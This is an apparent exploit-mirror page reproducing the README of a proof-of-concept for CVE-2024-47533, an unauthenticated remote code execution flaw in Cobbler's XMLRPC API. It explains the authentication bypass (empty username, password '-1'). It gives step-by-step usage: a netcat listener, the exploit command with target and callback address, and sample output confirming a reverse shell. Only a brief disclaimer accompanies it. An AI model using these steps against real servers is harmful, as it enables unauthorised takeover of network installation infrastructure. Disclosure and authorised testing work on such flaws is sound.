Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-47533 PoC — Cobbler 授权问题漏洞

Source
https://github.com/00xCanelo/CVE-2024-47533-PoC
Associated Vulnerability
Title:Cobbler 授权问题漏洞 (CVE-2024-47533)
Description:Cobbler是Cobbler开源的一款网络安装服务器套件,它主要用于快速建立Linux网络安装环境。 Cobbler 3.0.0到3.2.3和3.3.7之前版本存在授权问题漏洞,该漏洞源于身份验证不当,导致任何能够通过网络访问服务器的人都可以完全控制该服务器。
Readme
# CVE-2024-47533 – Cobbler XMLRPC Authentication Bypass → Reverse Shell (Unauthenticated RCE)

## 📌 Summary
This repository contains a **Proof-of-Concept (PoC) exploit** for **CVE-2024-47533**,  
a critical authentication bypass in Cobbler's XMLRPC API that leads to **unauthenticated remote code execution (RCE)**.

The exploit leverages the XMLRPC API's `login()` method flaw to bypass authentication and inject a reverse shell command via `background_import()`.

---

## ⚠️ Disclaimer
This tool is intended for **educational, research, and authorized penetration testing only**.  
Do **NOT** use it on systems you do not own or have explicit written permission to test.  
The author assumes **no liability** for misuse or damages.

---

## 🛠 Technical Details
- **Vulnerability Type:** Authentication Bypass → RCE  
- **Affected Component:** Cobbler XMLRPC API  
- **Attack Vector:** Network  
- **Privileges Required:** None  
- **User Interaction:** None  

**Root Cause:**  
`utils.get_shared_secret()` incorrectly returns `-1` due to mishandling file reads in binary mode with an encoding, allowing authentication with an empty username and `-1` as the password.

**Impact:**  
An attacker can:
- Gain admin-level API access
- Inject arbitrary system commands into Cobbler templates
- Spawn a reverse shell on the target

---

## 🚀 Usage

### 1️⃣ Clone the repository
```bash
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
```

### 2️⃣ Set up a listener
On your attacking machine:
```bash
nc -lvnp 4444
```

### 3️⃣ Run the exploit
```bash
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
```

**Example:**
```bash
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
```

---

## 📂 File Structure
```
.
├── CVE-2024-47533.py  # Reverse shell exploit script
└── README.md          # Documentation
```

---

## 📸 Example Output
```plaintext
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
```

---

## 🧑‍💻 Author
**00xCanelo**  
[GitHub Profile](https://github.com/00xCanelo)

---

## 📚 References
- [NVD: CVE-2024-47533](https://nvd.nist.gov/vuln/detail/CVE-2024-47533)
- [Cobbler Project GitHub](https://github.com/cobbler/cobbler)
File Snapshot

 [4.0K]  /data/pocs/a2833d1512c0ab076c2a3951258ddd1a22347b54
├── [6.4K]  CVE-2024-47533.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.